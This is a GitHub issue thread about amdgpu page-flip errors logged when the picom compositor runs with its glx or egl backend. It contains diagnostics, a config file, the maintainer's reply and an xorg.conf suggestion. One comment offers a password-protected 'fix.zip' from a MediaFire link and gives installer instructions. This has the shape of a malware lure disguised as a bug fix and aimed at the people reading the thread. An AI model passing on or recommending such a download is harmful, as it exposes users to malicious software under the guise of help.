### ISSUE TITLE
page flip errors with amdgpu and picom glx/egl backends

### ISSUE THREAD

**Issue by thalin** [yshui/compton#1328]
### Platform
NixOS 24.11 unstable rev `d0e1602ddde669d5beb01aec49d71a51937ed7be`

### GPU, drivers, and screen setup
AMD 8700G iGPU (device ID 5567) using amdgpu open source driver version 2.0.316, Samsung Odyssey G9

### Environment
qtile 0.28.1

### picom version
v11
<details>
<summary>Diagnostics</summary>

**Version:** v11

### Extensions:

* Shape: Yes
* RandR: Yes
* Present: Present

### Misc:

* Use Overlay: No
  (Another compositor is already running)
* Config file used: /home/thalin/.config/picom/picom.conf

### Drivers (inaccurate):

AMDGPU, Radeon

### Backend: glx

* Driver vendors:
 * GLX: Mesa Project and SGI
 * GL: AMD
* GL renderer: AMD Radeon Graphics (radeonsi, gfx1103_r1, LLVM 18.1.8, DRM 3.54, 6.6.47)
* Accelerated: 1

### Backend: egl

* Driver vendors:
 * EGL: Mesa Project
 * EGL driver: radeonsi
 * GL: AMD
* GL renderer: AMD Radeon Graphics (radeonsi, gfx1103_r1, LLVM 18.1.8, DRM 3.54, 6.6.47)</details>

### Configuration:
<details>
    <summary>Configuration file</summary>

```
active-opacity = 1.000000;
backend = "glx";
daemon = true;
fade-delta = 10;
fade-exclude = [  ];
fade-in-step = 0.028000;
fade-out-step = 0.030000;
fading = false;
inactive-opacity = 1.000000;
opacity-rule = [  ];
shadow = false;
shadow-exclude = [  ];
shadow-offset-x = -15;
shadow-offset-y = -15;
shadow-opacity = 0.750000;
vsync = false;
wintypes: { dropdown_menu = { opacity = 1.000000; }; popup_menu = { opacity = 1.000000; }; };
```
</details>

### Steps of reproduction
1. Start picom
2. journalctl -f

### Expected behavior
No messages

### Current Behavior
Many, many messages like the following:
```
Aug 28 21:55:03 msa1 xserver-wrapper[313038]: (WW) AMDGPU(0): flip queue failed: Invalid argument
Aug 28 21:55:03 msa1 xserver-wrapper[313038]: (WW) AMDGPU(0): Page flip failed: Invalid argument
Aug 28 21:55:03 msa1 xserver-wrapper[313038]: (EE) AMDGPU(0): present flip failed
```
Always in this group of 3.

Otherwise, no abnormal behavior as far as I can see. Visually there's no difference between xrender backend (which doesn't cause this error) and glx/egl. However, `xsecurelock` doesn't work well with the xrender backend, so I was hoping to use the glx backend...it just spams my system log an annoying amount.

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yshui** [comment]
This is a Xorg driver issue. This is not picom bug. Also please try updating to the latest picom version, see if that helps.

**Comment by tcapd** [comment]
The problem is a page-flip conflict between amdgpu and picom. Applying the following configuration resolves the issue by delegating vsync exclusively to amdgpu.

# picom.conf
vsync = false;

# /etc/X11/xorg.conf
Section "Device"
    Identifier "AMDGPU"
    Driver "amdgpu"
    Option "DRI" "3"     
    Option "AsyncFlipSecondaries" "false"   
    Option "TearFree" "true"
    Option "EnablePageFlip" "on"
EndSection
